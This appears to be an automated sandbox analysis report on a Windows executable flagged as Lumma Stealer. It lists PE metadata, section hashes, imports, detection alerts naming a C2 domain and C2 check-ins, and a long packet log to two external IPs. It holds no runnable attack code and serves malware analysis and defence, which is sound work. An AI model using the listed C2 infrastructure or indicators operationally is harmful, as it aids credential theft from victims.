                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.A;#..;#..;#...lK.:#..%qY.%#..%qH./#..%q^.U#......>#..;#..O#..%qW.:#..%qI.:#..%qL.:#..Rich;#..........PE..L.....7e...........
                                                                    Icon Hash:46c7c30b0f4e0d59
                                                                    Entrypoint:0x401877
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6537EA89 [Tue Oct 24 16:02:17 2023 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:607342d0c32277611749326750554d8e
                                                                    Instruction
                                                                    call 00007F61487ED16Bh
                                                                    jmp 00007F61487E97EDh
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000328h
                                                                    mov dword ptr [00456C38h], eax
                                                                    mov dword ptr [00456C34h], ecx
                                                                    mov dword ptr [00456C30h], edx
                                                                    mov dword ptr [00456C2Ch], ebx
                                                                    mov dword ptr [00456C28h], esi
                                                                    mov dword ptr [00456C24h], edi
                                                                    mov word ptr [00456C50h], ss
                                                                    mov word ptr [00456C44h], cs
                                                                    mov word ptr [00456C20h], ds
                                                                    mov word ptr [00456C1Ch], es
                                                                    mov word ptr [00456C18h], fs
                                                                    mov word ptr [00456C14h], gs
                                                                    pushfd
                                                                    pop dword ptr [00456C48h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [00456C3Ch], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [00456C40h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [00456C4Ch], eax
                                                                    mov eax, dword ptr [ebp-00000320h]
                                                                    mov dword ptr [00456B88h], 00010001h
                                                                    mov eax, dword ptr [00456C40h]
                                                                    mov dword ptr [00456B3Ch], eax
                                                                    mov dword ptr [00456B30h], C0000409h
                                                                    mov dword ptr [00456B34h], 00000001h
                                                                    mov eax, dword ptr [00454004h]
                                                                    mov dword ptr [ebp-00000328h], eax
                                                                    mov eax, dword ptr [00454008h]
                                                                    mov dword ptr [ebp-00000324h], eax
                                                                    call dword ptr [000000C0h]
                                                                    Programming Language:
                                                                    • [C++] VS2008 build 21022
                                                                    • [ASM] VS2008 build 21022
                                                                    • [ C ] VS2008 build 21022
                                                                    • [IMP] VS2005 build 50727
                                                                    • [RES] VS2008 build 21022
                                                                    • [LNK] VS2008 build 21022
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5290c0x3c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000x112f0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x524700x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x510000x194.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x4fe5c0x500008551e924f9b8a4a2c69914d8eb8820b9False0.8433258056640625data7.542034715807606IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x510000x22180x24001e73e104059fece98feab08a81957bb7False0.3492838541666667data5.38413002657157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x540000x3dc4bc0x700065ed3e9a53a6bfb811c4fba65d95f4fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x4310000x112f00x114008228ffabb01be6b6a2293ca26b58bc68False0.5862488677536232data5.785337253574913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x4315e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                                                    RT_ICON0x4324880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                                                    RT_ICON0x432d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                                                    RT_ICON0x4333f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                                                    RT_ICON0x4339600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                                                    RT_ICON0x435f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                                                    RT_ICON0x436fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                                                    RT_ICON0x4379380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                                                    RT_ICON0x437e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8121002132196162
                                                                    RT_ICON0x438cc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8438628158844765
                                                                    RT_ICON0x4395680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.826036866359447
                                                                    RT_ICON0x439c300x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.7947976878612717
                                                                    RT_ICON0x43a1980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.8044605809128631
                                                                    RT_ICON0x43c7400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8334896810506567
                                                                    RT_ICON0x43d7e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8426229508196721
                                                                    RT_ICON0x43e1700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8563829787234043
                                                                    RT_STRING0x43e8080x386data0.4567627494456763
                                                                    RT_STRING0x43eb900xb2data0.601123595505618
                                                                    RT_STRING0x43ec480x6d0data0.4288990825688073
                                                                    RT_STRING0x43f3180x71edata0.4313940724478595
                                                                    RT_STRING0x43fa380x6e2data0.43473325766174803
                                                                    RT_STRING0x4401200x65cdata0.43611793611793614
                                                                    RT_STRING0x4407800x71adata0.4251925192519252
                                                                    RT_STRING0x440ea00x7c8data0.41967871485943775
                                                                    RT_STRING0x4416680x756data0.4222577209797657
                                                                    RT_STRING0x441dc00x52edata0.4517345399698341
                                                                    RT_GROUP_ICON0x43e5d80x76dataTurkmenTurkmenistan0.6694915254237288
                                                                    RT_GROUP_ICON0x437da00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                    RT_VERSION0x43e6500x1b4data0.5688073394495413
                                                                    DLLImport
                                                                    KERNEL32.dllSearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, EndUpdateResourceA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                    USER32.dllGetProcessDefaultLayout
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    TurkmenTurkmenistan
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-18T20:55:39.186687+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249710172.67.179.207443TCP
                                                                    2024-12-18T20:55:40.836777+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249711176.113.115.1980TCP
                                                                    2024-12-18T20:55:44.631941+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.12512161.1.1.153UDP
                                                                    2024-12-18T20:55:46.337579+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.1249712172.67.220.223443TCP
                                                                    2024-12-18T20:55:46.337579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249712172.67.220.223443TCP
                                                                    2024-12-18T20:55:47.533720+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1249712172.67.220.223443TCP
                                                                    2024-12-18T20:55:47.533720+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249712172.67.220.223443TCP
                                                                    2024-12-18T20:55:48.594984+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.1249715172.67.220.223443TCP
                                                                    2024-12-18T20:55:48.594984+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249715172.67.220.223443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 20:55:36.925923109 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:36.925966978 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:36.926070929 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:36.940078974 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:36.940099955 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:38.166654110 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:38.166731119 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:38.641436100 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:38.641479969 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:38.641920090 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:38.641984940 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:38.645852089 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:38.687345982 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:39.186707020 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:39.186839104 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:39.186866045 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:39.186898947 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:39.188776016 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:39.188806057 CET44349710172.67.179.207192.168.2.12
                                                                    Dec 18, 2024 20:55:39.188818932 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:39.188853979 CET49710443192.168.2.12172.67.179.207
                                                                    Dec 18, 2024 20:55:39.302161932 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:39.422943115 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:39.423039913 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:39.423887014 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:39.543675900 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.836658955 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.836776972 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.836782932 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.836796999 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.836841106 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.837544918 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.837553978 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.837605000 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.838329077 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.838336945 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.838404894 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.839132071 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.839138985 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.839144945 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.839196920 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.956451893 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.956597090 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.956810951 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.956985950 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:40.960701942 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:40.960792065 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.028614044 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.028693914 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.028748035 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.028820992 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.032772064 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.032830954 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.033035040 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.033122063 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.041452885 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.041522980 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.042186975 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.042260885 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.049618006 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.049686909 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.050142050 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.050215006 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.058541059 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.058548927 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.058644056 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.067065954 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.067152977 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.067388058 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.067445040 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.075050116 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.075125933 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.075455904 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.075547934 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.084688902 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.084696054 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.084762096 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.091871023 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.091947079 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.092035055 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.092091084 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.100439072 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.100534916 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.101483107 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.101531982 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.108556032 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.108563900 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.108633995 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.108664989 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.148873091 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.148891926 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.149125099 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.220474005 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.220545053 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.220783949 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.220849991 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.222933054 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.222981930 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.223041058 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.223083973 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.226583004 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.226640940 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.226830959 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.226883888 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.231472015 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.231479883 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.231535912 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.236752987 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.236812115 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.237477064 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.237519979 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.241480112 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.241487980 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.241616011 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.245840073 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.245847940 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.245898008 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.251013994 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.251024961 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.251066923 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.251096964 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.255348921 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.255356073 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.255405903 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.259881020 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.259953976 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.260106087 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.260157108 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.264467001 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.264525890 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.265203953 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.265254974 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.269253016 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.269262075 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.269313097 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.273653030 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.273694038 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.273832083 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.273919106 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.278498888 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.278553963 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.278711081 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.278759003 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.282063961 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.282160044 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.282397985 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.282453060 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.286098003 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.286118031 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.286173105 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.289732933 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.289792061 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.289959908 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.290040970 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.293370008 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.293442011 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.293667078 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.293723106 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.296734095 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.296816111 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.296843052 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.296916962 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.300328970 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.300379038 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.300518036 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.300592899 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.303978920 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.304064989 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.304348946 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.304395914 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.307600975 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.307646990 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.307981968 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.308048964 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.311238050 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.311283112 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.311621904 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.311676025 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.340497017 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.340560913 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.340667963 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.340739965 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.412784100 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.412806988 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.412863016 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.414010048 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.414073944 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.414189100 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.414244890 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.417048931 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.417057037 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.417117119 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.420238018 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.420303106 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.420650959 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.420702934 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.423304081 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.423374891 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.423690081 CET8049711176.113.115.19192.168.2.12
